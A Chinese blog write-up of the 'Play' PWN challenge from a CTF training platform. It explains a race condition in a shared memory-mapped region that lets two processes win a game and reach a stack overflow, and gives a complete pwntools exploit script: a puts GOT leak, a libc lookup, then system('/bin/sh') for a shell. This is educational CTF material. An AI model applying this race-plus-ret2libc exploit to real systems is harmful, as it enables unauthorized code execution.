攻防世界PWN之Play(条件竞争)题解

最新推荐文章于 2022-07-23 22:42:34 发布
最新推荐文章于 2022-07-23 22:42:34 发布
阅读量1.8k 收藏 2
点赞数
分类专栏: pwn CTF 二进制漏洞 文章标签: PWN CTF 二进制漏洞 缓冲区溢出 逆向工程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/103615984
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏

Play(条件竞争,多进程共享同一数据区域)

首先,检查一下程序的保护机制,很好

然后,我们用IDA分析,发现一个很明显的栈溢出漏洞

但是,要想执行这个漏洞函数,就必须打赢游戏

而,要打赢游戏,就是让*(_DWORD *)(gMonster + 8)的值小于等于0,也就是Host的Surplus要小于等于0

然后,我们看到这里有一个修改(gMonster + 8)值的地方

也就是Host和Hero互相攻击,消减对方的生命值,我们继续分析,发现gHero指向的是一个内存映射出来的区域

那么,假如我们同时运行两个该程序的进程,并且登录同一个用户名,那么,它们的gHero是同一个内存区域,那么,gHero就叠加了两种技能,于是就可以打败BOSS。执行漏洞函数,getshell

我们可以这样

  1. change_skill(io1, 3)  
  2. attack(io1)  
  3. change_skill(io2,1)  
  4. use_hide(io1, 1)  

如上代码,io1使用技能3,会导致双方的生命值都增加,当我们使用技能3 attack时,当出现use hiden_methods?(1:yes/0:no)选择时,我们通过io2来改变gHero的技能,使得执行后面的代码时,gHero的生命值增加,gMonster的生命值递减,这样,我们就能赢得游戏

也就是说,在read_int()阻塞io1时,我们通过io2改变了gHero的相关属性,使得后面的代码取得的gHero数据和之前不一致。

程序使用了类似于虚表的东西来实现不同技能,从不同的地方取数据,感兴趣的同学可以仔细跟踪一下几个技能,分别对应的数据在哪,然后找到让gHero技能递增,gMonster递减的攻击模式。我们上述的是一种攻击方法,可能还会有其他攻击方法。

打赢了游戏,就是一个简单的栈溢出漏洞,直接利用即可。

综上,我们的exp脚本

  1. #coding:utf8  
  2. from pwn import *  
  3. from LibcSearcher import *  
  4.   
  5. debug = 1  
  6.   
  7. if debug:  
  8.    io1 = process('./pwnh38')  
  9.    io2 = process('./pwnh38')  
  10. else:  
  11.    addr = '111.198.29.45'  
  12.    port = 59829  
  13.    io1 = remote(addr,port)  
  14.    io2 = remote(addr,port)  
  15.   
  16. elf = ELF('./pwnh38')  
  17. puts_plt = elf.plt['puts']  
  18. puts_got = elf.got['puts']  
  19. vul_func = elf.sym['vul_func']  
  20.   
  21. def login(io, name):  
  22.    io.sendlineafter("login:", name)  
  23.   
  24. def attack(io):  
  25.    io.sendlineafter("choice>> ","1")  
  26.   
  27. def use_hide(io, choice):  
  28.    io.sendlineafter("(1:yes/0:no):",str(choice))  
  29.   
  30. def change_skill(io, choice):  
  31.    io.sendlineafter("choice>> ","3")  
  32.    io.sendlineafter("choice>> ", str(choice))  
  33.   
  34. def god_attack(io1, io2):  
  35.    change_skill(io1, 3)  
  36.    attack(io1)  
  37.    change_skill(io2,1)  
  38.    use_hide(io1, 1)  
  39. def pwn(io1, io2):  
  40.     login(io1, "test\n")  
  41.     login(io2, "test\n")  
  42.     while True:  
  43.         god_attack(io1, io2)  
  44.         data = io1.recvuntil("\n")  
  45.         if "you win" in data:  
  46.             data = io1.recvuntil("\n")  
  47.             if "remember you forever!" in data:  
  48.                 break  
  49.     #泄露puts的地址  
  50.     payload = 'a'*0x4C + p32(puts_plt) + p32(vul_func) + p32(puts_got)  
  51.     io1.sendlineafter('name:',payload)  
  52.     io1.recvuntil('\n')  
  53.     puts_addr = u32(io1.recv(4))  
  54.     #查询数据库,得到libc的信息  
  55.     libc = LibcSearcher('puts',puts_addr)  
  56.     #获得libc基址  
  57.     libc_base = puts_addr - libc.dump('puts')  
  58.     system_addr = libc_base + libc.dump('system')  
  59.     binsh_addr = libc_base + libc.dump('str_bin_sh')  
  60.     #getshell  
  61.     payload = 'a'*0x4C + p32(system_addr) + p32(0) + p32(binsh_addr)  
  62.     io1.sendlineafter('name:',payload)  
  63.   
  64. pwn(io1, io2)  
  65. io1.interactive()  
  66. #io2.interactive()  

本题告诉我们,对于程序中使用文件时,应该加类似于锁的东西,使得当前程序获得文件的所有权后,其他的不能在那个程序运行期间获得文件的所有权。

ha1vk
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【学习笔记】CTF PWN选手的养成(四)其他漏洞 && 从CTF到实战
prettyX的博客
12-06 1493
0X01 格式化字符串 1、格式化串介绍:https://en.wikipedia.org/wiki/Printf_format_string 2、格式化串相关函数:printf、fprintf、sprintf等 3、格式化漏洞: 触发形如printf(fmtstr)的调用,fmtstr="%$22p"时可以打印栈指针之后第22个DWORD,fmtstr="%1000c%22n"时可以将栈...
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
5. **解题策略**:在广东大学生网络攻防大赛的"Pwn"类题目中,参赛者需要理解漏洞的原理,分析程序的内存布局,找到可利用的gadgets,构造溢出payload,并利用"jmp_rsp"或其他方法控制程序执行流程。这需要扎实的...
play [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列26(超详细分析)
重新启程
12-29 755
题目地址:play 本题是高手进阶区的第15题,比较有意思! 先看看题目: 后面的题目都是十颗星的难度,需要具备比较好的漏洞挖掘能力,在这些题目中我们能学到各种各样的新的姿势。 惯例先看看保护机制: [*] '/ctf/work/python/play/a642a99a83fe4e31b1bd75959e52e6a1' Arch: i386-32-little ...
linux kernel pwn学习之条件竞争(一)
seaaseesa的博客
03-04 1790
Linux kernel条件竞争 条件竞争发生在多线程多进程中,往往是因为没有对全局数据、函数进行加锁,导致多进程同时访问修改,使得数据与理想的不一致而引发漏洞。本节,我们从wctf2018-klist这题来分析一下条件竞争制造UAF的利用。 wctf2018-klist 首先,查看一下启动脚本,发现开启了smep机制,说明内核不能直接执行用户空间的代码 qemu-system-x86_...
攻防世界PWN play 条件竞争漏洞的利用
aptx4869_li的博客
05-26 558
攻防世界PWN-play漏洞利用思路 检查保护机制 healer@healer-virtual-machine:~/Desktop/play$ checksec play [*] '/home/healer/Desktop/play/play' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE
湖湘杯pwn400的wp
一个码农的笔记
12-09 2025
湖湘杯的pwn比赛很有趣,我做了pwn300的题目,感觉不错,我把wp分享出来,pwns的下载链接是: http://download.csdn.net/download/niexinming/10152069 把pwn400直接拖入ida中: main函数: Create Profile函数: Print Profile函数: Update Profile函数: Ex
攻防世界PWN之waterdrop题解(条件竞争+pwn的盲注)
seaaseesa的博客
02-17 1113
Waterdrop 首先,我们检查一下程序的保护机制 解法一 然后,我们用IDA分析一下,在guess_secret函数里,存在一个伪条件竞争漏洞 V11为有符号数,而j为无符号数,v11如果为负数,比如-1,那么根j比较时,v11会先转成无符号数,因此变成最大值。那么循环就要很多次,导致结束这个需要循环有一定的时间。 然后,我们注意到open的flag里有O_TRUNC标志位...
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
攻防世界pwn题:forgot.doc
07-13
攻击防御世界pwn题:forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
level0 -- 攻防世界新手题
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
Pwn】fuzzerinstrospector(首届数字空间安全攻防大赛)
07-16
Pwn】fuzzerinstrospector 是首届数字空间安全攻防大赛中的一项挑战,这个比赛旨在测试参赛者在信息安全领域的技能,特别是针对软件漏洞的发现和利用能力。在这个特定的挑战中,参赛者可能需要使用模糊测试...
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
PWN入门之数组越界-附件资源
03-05
PWN入门之数组越界-附件资源
browser_pwn:浏览器pwn,现在主要工作
03-22
浏览器Pwn,顾名思义,是指针对浏览器的安全攻防技术,主要集中在发现并利用浏览器中的漏洞进行攻击。在这个领域,V8_pwn 和 JSC_pwn 是两个关键的子领域,分别关注Google Chrome浏览器的V8 JavaScript引擎和Apple ...
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
Kernel pwn 入门 (5)
CoLin的pwn小屋
07-23 972
Kernel pwn 入门之double fetch
linux kernel pwn学习之条件竞争(二)userfaultfd
seaaseesa的博客
03-04 3423
userfaultfd、mobprobe_path、mod_tree的利用 userfaultfd是linux下的一直缺页处理机制,用户可以自定义函数来处理这种事件。所谓的缺页,就是所访问的页面还没有装入RAM中。比如mmap创建的堆,它实际上还没有装载到内存中,系统有自己默认的机制来处理,用户也可以自定义处理函数,在处理函数没有结束之前,缺页发生的位置将处于暂停状态。这将非常有助于条件竞争的利...
2019广东省强网杯PWN-1
SkYe's Blog
09-24 702
2019广东省强网杯PWN-1 题目分析 题目提供了:可执行文件、libc.so.6两个文件。下面开始分析,首先运行程序,如下图所示: 这是一道菜单题目,可以添加、删除、运行。是一道在堆上的题目。然后用IDA分析程序的流程。 首先看看主函数(main),对其中的部分函数做了重命名(在图中红框内函数),可以参照修改。 主函数 主函数循环执行,直到遇到exit()。首先是运行welcome_bro...
Pwn基础学习1-[栈溢出]/篇2
m0_52343643的博客
03-29 2304
继上一篇的内容 题目3-ret2syscall 定义 控制程序执行系统调用 原理 不同于之前的 ret2text 和 ret2shellcode 题型,系统调用并不是执行程序中现有的代码或自己写进去的代码,其实就如其字面意思,系统调用就是我们让系统来调用一些函数,那么如何做到让系统来调用,需要满足以下几个条件: 某函数的系统调用号【系统调用号表】—— 放在寄存器 eax 需传入某函数的参数 —— 放在寄存器 ebx、ecx、edx 一个指令 —— int 0x80 int 0x80(软中断)
攻防世界 pwn repeater
最新发布
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于repeater题目,根据引用中提供的代码,该题目涉及到了远程攻击和内存溢出的技术。代码中使用了pwn工具包来进行远程连接和漏洞利用。通过发送一段恶意输入,攻击者可以覆盖程序的返回地址,使得程序执行恶意的shellcode。 具体地说,代码中通过发送一系列的输入,包括恶意shellcode,使得程序发生内存溢出,覆盖了主函数的返回地址,从而让主函数正常退出,并跳转到shellcode的首条指令处。 在此过程中,使用了pwn工具包中的一些功能,如远程连接、编码shellcode等。代码中也展示了一些具体的操作步骤,如发送输入、计算地址等。 综上所述,攻防世界中的pwn和repeater题目分别涉及到了漏洞利用和内存溢出的技术。通过精心构造的输入,攻击者可以利用程序的漏洞来执行恶意代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值